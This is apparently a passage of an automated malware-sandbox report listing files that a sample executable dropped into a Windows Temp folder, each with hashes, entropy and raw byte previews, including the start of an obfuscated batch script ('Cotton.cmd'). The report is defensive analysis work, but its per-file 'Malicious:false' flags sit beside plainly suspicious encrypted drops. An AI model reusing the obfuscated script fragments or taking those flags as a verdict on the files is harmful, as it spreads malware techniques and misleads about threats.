                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\3ebf99e2-41d6-4600-8a21-a58d46cdb7f3.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\905818c3-aade-4b93-9f56-b72d0d5cc7b5.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):76326
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                          MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                          SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                          SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                          SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Aspects

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997939569708211
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:GOOFoyw52FfqWQW27lac2Ln4j2rQCf0lpFxTxm2ojwnj8YiLIEuDY3xqvNJy+KmG:TNyGAqW127vQn82rWvTxmb8j8fURMxq6
                                                                                                                                                                                                                                                                                          MD5:9FE2A2B5AC024292BF68A6E7F7400FDA
                                                                                                                                                                                                                                                                                          SHA1:9CA9E1409E99C73F3F3D8EF93CAD8CBA543CB68E
                                                                                                                                                                                                                                                                                          SHA-256:E77C369DC6EF2BEB7CC9849AD7B6ECCAD28487AD2AE68539A4D2C8482CCF59E0
                                                                                                                                                                                                                                                                                          SHA-512:0957D995C6D22C9CACED4D4ACBA3C27778C940256EB9895B457F91CC48C7313C17BC0018DDED526253D0839110EC9589E9CC073738EA76419E8768208D70F580
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0..N>q>....b.....fjj. ../....i>0..!>sp[H..).....*_=...r...?kc.eeLf^.....f$...d....z.m.....2.`'gZ.:.y....p..r,K.|@..j....g&..1.u..P.~j....!.E.. k.....A.QD[..aIPT.+.ns..J....W.Y..q.u.....G......K.6...+>..e}.....O...1.X...?T..... Zg......2.,K._'&...l.......|......~...{_H.I....k...m.....N..B&t..}..}Gi.....E..k.B....#o.#.....x....z.....z....A5.0E|/2..?pX....+.(..W.SB...O...(...6b.n..0`WW.]5.eh.H.MF..Mw..r....G ..Lfo.6..-5..*.;w[...a....1j..c...g...I..k^.j.p.}.....o.J..y.6..J:E.8.}[....U...+.....l..}.`....@.\+R.W.tXd....~..T..6+<...U.w...B....6w.p.NK..ak....].E.jv M....,P...C.m....A..k.N0..cil{.GH.v....ku^]`.....W......f.l.3....:./h.(.p.S.G........jf.z.k`.[eG9_..J.-.Q.I(..F... ..W.!0..E....by..1.*..{..jG.+.3.rY...%...UO.O.m.N.4...R ...p.....'....u..U..I.I.....{...QdR..D.n..-(..(....y.{.DF=......f.. .8..XW...r.2.xSehL .QJ.A..O.2!...R..K^...wv...7...U......<..)W...O...........c...yOi..Dt....;..`.SRk.#...Q.#...Y=qc.4.._m.r....D.....G..'..te?.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Cotton

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1076), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28328
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0985136805398525
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:iqf2SSHxm1ASvzM2Ypm2v08kHDSWmWNPAb/:dVSHuDxd8kB1Pq/
                                                                                                                                                                                                                                                                                          MD5:C4B092E0A5C2288CA415EEF4CC2CB6A8
                                                                                                                                                                                                                                                                                          SHA1:F53FF9CB9F89FC6D4A8D0D8E6F66F51BFD8EBFFC
                                                                                                                                                                                                                                                                                          SHA-256:4F6051DE636C321C5B2AB1E5485BA9C4ADF2D62585E37BD1D873E13D0E6099F7
                                                                                                                                                                                                                                                                                          SHA-512:D64C675E2D26AF84B5B9583F9BE21FACD826F2F6432266605F3FC9953A441D6FB37753275DADF6921163FB69667F2971BED44044375391D6527D93D1DD349328
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Set Instrumentation=o..SiSLKennedy-Listings-Plugins-Deployment-..mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-..dqBRFrost-Naturally-..sUkPPoultry-Skirts-Picked-..NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-..rHfnProportion-Sing-Pearl-Existing-Ent-..LoyYo-Songs-..tTBasically-Dsc-..UlGAnimals-Systematic-Kansas-..MAModems-Knowing-Rise-Carries-Browsers-Startup-Themes-Href-..Set Influence=e..KbNtBuy-Id-..WpgESonic-Rb-Organization-Curves-..WcYElse-Bigger-Opt-Dealer-Normal-Adjacent-Col-Luggage-..rgrChanging-Midnight-Rx-Careful-Canvas-..fZNKWelfare-Habitat-Foster-Boxing-Publishing-Gets-Pr-Greatly-..RoInListed-Holdings-Shoulder-Hawk-Poker-Crown-Exclusively-Explorer-Expert-..rbkLevels-Place-Talks-Male-Gg-Runtime-Dip-Contrary-..rQuTamil-Disclosure-Porsche-Wn-..dlFnMpeg-Bathrooms-Keywords-Louis-Paypal-..Set Asks=z..GaDGuidance-Sake-Retrieved-..GhAgHumidity-..QAJesus-Xp-Powder-Bridges-Mfg-Potentially-Thou-..ZYApril-Loves-Closes-Tile-Receive-Centre-Tunisia

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Cotton.cmd

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1076), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28328
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0985136805398525
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:iqf2SSHxm1ASvzM2Ypm2v08kHDSWmWNPAb/:dVSHuDxd8kB1Pq/
                                                                                                                                                                                                                                                                                          MD5:C4B092E0A5C2288CA415EEF4CC2CB6A8
                                                                                                                                                                                                                                                                                          SHA1:F53FF9CB9F89FC6D4A8D0D8E6F66F51BFD8EBFFC
                                                                                                                                                                                                                                                                                          SHA-256:4F6051DE636C321C5B2AB1E5485BA9C4ADF2D62585E37BD1D873E13D0E6099F7
                                                                                                                                                                                                                                                                                          SHA-512:D64C675E2D26AF84B5B9583F9BE21FACD826F2F6432266605F3FC9953A441D6FB37753275DADF6921163FB69667F2971BED44044375391D6527D93D1DD349328
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Set Instrumentation=o..SiSLKennedy-Listings-Plugins-Deployment-..mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-..dqBRFrost-Naturally-..sUkPPoultry-Skirts-Picked-..NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-..rHfnProportion-Sing-Pearl-Existing-Ent-..LoyYo-Songs-..tTBasically-Dsc-..UlGAnimals-Systematic-Kansas-..MAModems-Knowing-Rise-Carries-Browsers-Startup-Themes-Href-..Set Influence=e..KbNtBuy-Id-..WpgESonic-Rb-Organization-Curves-..WcYElse-Bigger-Opt-Dealer-Normal-Adjacent-Col-Luggage-..rgrChanging-Midnight-Rx-Careful-Canvas-..fZNKWelfare-Habitat-Foster-Boxing-Publishing-Gets-Pr-Greatly-..RoInListed-Holdings-Shoulder-Hawk-Poker-Crown-Exclusively-Explorer-Expert-..rbkLevels-Place-Talks-Male-Gg-Runtime-Dip-Contrary-..rQuTamil-Disclosure-Porsche-Wn-..dlFnMpeg-Bathrooms-Keywords-Louis-Paypal-..Set Asks=z..GaDGuidance-Sake-Retrieved-..GhAgHumidity-..QAJesus-Xp-Powder-Bridges-Mfg-Potentially-Thou-..ZYApril-Loves-Closes-Tile-Receive-Centre-Tunisia

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Disciplines

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):140288
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.62398967412333
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:VPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBS:VPj0nEo3tb2j6AUkB0CThp6vmVnk
                                                                                                                                                                                                                                                                                          MD5:066B4D81397FCA8067B90CF221F569A6
                                                                                                                                                                                                                                                                                          SHA1:8AD2B0CCD4019E1DBBC9CD43C500F7BCE218DA52
                                                                                                                                                                                                                                                                                          SHA-256:2552FC325D401DB16547E234161954304E20DD0DEE708E7CF4164496F2A94A25
                                                                                                                                                                                                                                                                                          SHA-512:2F3FCD5A625DF9C19848817823C3D7F6516F1C7AB71B8BB0D6FB1E75EADDF56318748BB0ED3F36E5839798CFA2967C85FF5AB983B93B07733E5D873EB40A289B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:A...........B....=....8..A......u... ..t..A......u...@..t..A.....j.X...........s......8........G........H..|1...D1.t..@8.@......|1...D1.t..@8.@...h....6.......t..@...j.@P.QK...v.......~....u....@..p.......G......S........'.3.A.O....P..|....D..t..@8.H..D...|....].I..y..u....6.d...P..........f...3.7A.O....D..............H..|....D..t..@8.@......D...|...t..@8.@........].......M....@PQ.u...WR.................B.jN.D..Yf9H........+.....@.Pjk...u.jz...u.j~...E...@.Pj}....E.......U.........M...u..U.........M...@.Ph......E...........r........F........H..|9...D9.t..@8.@......|9...D9.t..@8.@...'....e...E..e..j.PWQ..].......P#M...L...........xH.E...j..@....Yf9H.t...@.Pjr.$.M........ .....\#M.t.=....|.j.h........D...M...........N..........~..t..v....Y.N.........Q...Y.....j...|.I..n....q.Q.x[.....u.^.k...Hj........Y.......F..G...u.j.X........P.F......Y.........0.I.......^.............P....F..H...,....F.......F................u...(M...(.....L)M......8.......&.........V.G....M.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Except

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):96256
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998303347421561
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:uuo+0lhbDFoqzG6zZr6dI+4Fv/P7niArrdRovVMuue/UbBp5U4SEZgiv/RJvU9Mz:v0lhbDFNq8X5rjovVMuu7p5U4SqfzvUm
                                                                                                                                                                                                                                                                                          MD5:DBF98F4C6B30E7B26B8C82CAE3D4AEA7
                                                                                                                                                                                                                                                                                          SHA1:24D908308072407FC60A770ECC207E078750056A
                                                                                                                                                                                                                                                                                          SHA-256:7529D80D2EC91B85984F38F11C932660C0B1D6DA1CD101C610E6A9C223F870A7
                                                                                                                                                                                                                                                                                          SHA-512:83D01886D8860F569E19C79EADE71C45C8EC1781901D64569038FCCAF176F7BBDB2C273454A6D1941A0A39CCF0D4D6613280D7F91F799C0AB9ED6C579C8CF46E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:J...K.Q......2]Z.`P.t.10........AS.....M......(.|Jl....k..mAC..>h~Q3(x*....1..|...!P0....H.G..%!.k.....cx..@M...-.</...v.W(...nz...u.J.y[..........Vv.R...>5 E.Eg..h..~55.u..P/..n6k....[....J.8.t^h:...>.....*..b.9.'3iI..2.6M.{.3L.^..M~*..T......H........8edg........K.<."..,.....8..S./../Ew<.....[...e..Qo{...M.....|....e...Zz.|,>=.<`...q]:.K.(.fTJ.B..UQ^>*n@.%-{.a.=...;..e'6.Y.r0.-,Bj...L2.j)u.e.*..(...|^G.(..R....e_kJl.N..x\9.2T...7....&y..h...D..........m.......d.P=.^.V"@OJ.x.*R..#!D.d.RI*..!.....j...lX....=..\.....v.6N...t...v9.....V.a.^-....I....YFOc.h*..J...q.v.-^.....dv...Y-...p.........M.c..%...J..b#.V[.....Vi.J8.s....F........&..'..i.zN...9.m`0.K`d..+.;.$............_.....}[.oy......j5B...3...Q0.ot..+A.K[{d....._T.#G.(.....%R.#.T.o..Kt.`.2..Rc.P.q.[....Cb.Q.....vD0.n.DY...........w...w|'N.WjJ.T.N.z....F..S..a...b?.<e.....*-..>h.V....zb4....R..>8.2..f=..l..`....}...Z.s..R..._.V..c\.J.c..........*..|..?i*..xo.{.>7.u.4.+.;.nl'..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Licence

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):82944
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.6751161795688665
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:AU0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOV:AUDQWf05mjccBiqXvpgF4qv+32eOV
                                                                                                                                                                                                                                                                                          MD5:1ED3A8CF826F2FE26057E5A5560D55E9
                                                                                                                                                                                                                                                                                          SHA1:9BB6B9318DE929C606D499FD462B7985D1F3ABDE
                                                                                                                                                                                                                                                                                          SHA-256:9F327EE277A42C7B9F6F59359E2D9C15ECDE9A1B8D94BFB33EC5341E8FE2172D
                                                                                                                                                                                                                                                                                          SHA-512:4099C891AAA686A3E209CC9B4CBD33A7C2B85B4533CCA305B7E3DAD4136B5F4CE9486A92F6AFFFC129D1CD4ECF2B05807260A4E944CA85BC21CACEF4A46B270C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.....P.E$..U.PS.u.E.Q.u..M.P......4...._....M(......]..IX;........E......;............;.........`....u.j)Zf9........},........U..U.........B....M...|....M..M..M..M..M.M.3..\........;..d.....O....}.........................H....]...D...3..u..u(.M.P.u..v@S....3.....9...v.......w....M...u..G....w.....M.E..E..E..M..M...|....E...........................j.X;.......j.X;........M.....3...j.X;...(...;... .....j.X;...&...j.Y.G.;.K ..+K.....#U..}...U.M..."....U.j.^f.:..U......j]Xf9F........ ....M..M....|....M..M..M.;...%.......E...l....E.;...(....U......],.......t.....+.G.;.......j.Y.G...U....jxXf....f....f.....@...U....SV.u......W.}...U.M.;........E.3.M.........%.....E........u.;.w/.}...+.A..M.............:...F..:;.v.u..}..E.......w......;........E._^[..U..V.u.W..t...9N....I.Bf;.t......H_^].3...U.......SVW....1L...3.}.B..A.......;.......jw[..>..j.Y..}........u...........f;.......@f;............f;..........f;........Axf;...c...@f;...Y....Azf;...M...@f;...C....Asf;.......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Listing

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):76800
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.6521294882164295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:tmV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL2W:0BxT/sZydTmRxlHS3NxrHSBRtf
                                                                                                                                                                                                                                                                                          MD5:83EB2EFE20FFCA5AD15451D411A87A8D
                                                                                                                                                                                                                                                                                          SHA1:73A68411B137343E6E9E89507521F2CB7F8AB3E3
                                                                                                                                                                                                                                                                                          SHA-256:9983E7C4E2A85812A2290CF36202E28D48E7472CEF8974065D86FBCEF4E1D68D
                                                                                                                                                                                                                                                                                          SHA-512:048E0AF2D6953533B27A2467F12AE1309D94914FB6F55D1F5EC0869196CF271E605D5E0E1D4FCB6D8891331EA036A266BE426F943B9D4A8C7E0E8BD603F6210C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........E.....t5..%....=....u"..O...............................U.....................L......3....E.,K.......K.;E....;M...+....E.<W@.}..E.;E...`........;M.......;~|..Z....}........E.....t5..%....=....u"..O...............................U.....................L......3....E.,K.......K.;E....;M...}....E.<W@.}..E.;E...`....b...;M...\...;~|.......}........E.....t5..%....=....u"..O...............................U.....................L.........E.,K.......K.... cL....t....t.3........;E........E.<W@.}..E.;E...N.......;M.............E.;~|.."....}.......t7..%....=....u&..G.......%....................E.....E......w>............w..........rX........... uJ..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M........E....E.}.........<G.E.@.}..E.;E........f............Y...;.......M....Fh9.......>....,/..;M...3...;~|.......}........E.....t0..%....=....u"..W...................E.....................L.............M.,K......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Myself

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):110592
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.707473925789043
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:4pvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwnR:4KODOSpQSAU4CE0Imbi80PtCZEMnVIP2
                                                                                                                                                                                                                                                                                          MD5:C7A2227BF20B4955A87F15FABF4C0E9B
                                                                                                                                                                                                                                                                                          SHA1:4EAB1FD9A1E5AC680D74EF619B4A19535FF4F6FB
                                                                                                                                                                                                                                                                                          SHA-256:D9CECDC1F7FE97F8E7C7FE5A75791B90CF4762DD3562B64DA585E6B93C602772
                                                                                                                                                                                                                                                                                          SHA-512:1EB7EF3731F2719C7E094DF76C78E21D51DA91B61969FE30B0589006F1FC0C2D068FB3FE069F232585788DE7A8148BB611F2BC1D5ABB1B54CA8EB1E3161ADED6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.......t.f..f...........f..t...u.f;E.t.f;E.j"Xu..t.3.f.B.......].3..E.f9..........f;E.t.f;E.u......3.f9.........t.......u...3.j\^.E............@f91t.j"^f91j\^u8..u 8].t.j"^f9q.j\^u......8]..]...E..}.....H..t.f.2.......u....f..t*8].u.f;E.t.f;E.t.9].t...t.f...........s....u..]...t.3.f.......3........t....._^[..]..U..V.u......?r.3..=W....M.3...u.;.s...M....+.;.w.3.....1j.P.j2..j............_^]..U..]........M...u%9...M.u.3.........u...........#...M..=..M..t.3..VW.W....S.......u.....*V....Y..u......P...M....M...3..3.j......YV.....Y.._^.=..M..t.3..VW.......u.....*V.....Y..u......P...M....M..o3..3.j......YV....Y.._^..U..QQSVW.}.3......<=t.B..Y...A..u.+.F.....u.B.j.P.51....YY..tm.]..R..Q...A..u.+.?=.A..E.t7j.P..1....YY..t0W.u.V._........uA.E.j..0....E..$....E.Y...?.u...S.#...j......YY3.j......Y_^..[..].3.PPPPP.......U..QQS.].3..E...VW.....f..t/j=[f;.t.B..y.f.....f;E.u.+....4N......f..u.]..B.j.P.H0....3.YY..ty.}..]..Q.f.....f;.u.+...j=.A.Y.E.f9.t8j.P..0....YY..t2S.u.V...

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\News

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):143360
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.221717132086737
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:mbLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsS:mbLezWWt/Dd314V14ZgP0JaAOz04phdB
                                                                                                                                                                                                                                                                                          MD5:D7C53D59BDBE13DBDC7530FBB4A36AAD
                                                                                                                                                                                                                                                                                          SHA1:0B83ABB5B72CB337C698026DF48E43CE0951AC9C
                                                                                                                                                                                                                                                                                          SHA-256:3F93A7CD187BBE380A2612C491EE0BE70C2EC5B616A33380A9FA393D9C557FEF
                                                                                                                                                                                                                                                                                          SHA-512:9B16D8D3C7CCB9FF99628E4CA8A3CEF7BDEB9607038CEC0FBE0284B4E07E968D7E23DE27A48E522389B575648B4C5F5CF4606E756A11F976597EAB1B1D05AE33
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:P.........t:.D$(..P..r...X...L..L$.. .....t..E..@..H..I...P...%....u,...H..|9...D9.t..@8.@......|9...D9.t..@8.@...L$.......L$(......L$8....._^3.[..]...U..V.u....i.....u..u.........&..F.............j...:..3.^]...U..V.u....-.....u..u........&..F.............j..:..3.^]...U..V.u..........t.........$....u..u....[....&..F.....3.^]...U......@...SV..M.h..I..b...u.....+..j....K+......?...I...Y..A...y...t..@8..P.....t..@8.@......y...A.t..@8.@...G.L$..1(...L$.....D$.P.......L$..0.....M..D$.P..q...L$.....L$...%..^3.[..]...U..V.u..........u;...H..|1...D1.t..@8.@......|1...D1.t..@8.u....@...<....&..........u...W.8.$....>_.F.....3.^]...U......$SVW.u....v.....u..u........3.C............D$.3.CSP..9..:........M..5s..j...SV.y...L$..D$,.d$4.j.SPV.L$<.\$H.Y.......L$ .....D$.3.S.D$$.D$$SPV.|$8.\$<.........L$ .b....D$.+D$.j..D$$.D$$SPV.|$8.\$<.........L$ .4....D$.+D$.j..D$$.D$$SPV.|$8.\$<..~......L$ ......8.u.........&..^....H..|9...D9.t..@8.X..|9...D9.t..@8.@.._^3.[..]...U.......V..M.h..I

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Paperback

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):60416
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.592459656125969
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:dGMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+ro:5pIbv18mLthfhnueoMmOqDoioOo
                                                                                                                                                                                                                                                                                          MD5:C7169A5E146748C2794CC7A1FDF398EF
                                                                                                                                                                                                                                                                                          SHA1:F53C8D146D9CAF426B75ADD269494A6B889EBD6F
                                                                                                                                                                                                                                                                                          SHA-256:89BB730051174BB5CAD7E412DE93424F062A9DB1BAC5EFF3314C72CBA734464F
                                                                                                                                                                                                                                                                                          SHA-512:67292DD584995FCC25D4EEE853B2D82CB695F0BE1D515641A1BFEC18535D09A4104ABD793CEA295E0462A905CF400472174C84E07FB03C08C7642134C35F2D40
                                                                                                                                                                                                                                                                                          Malicious:false
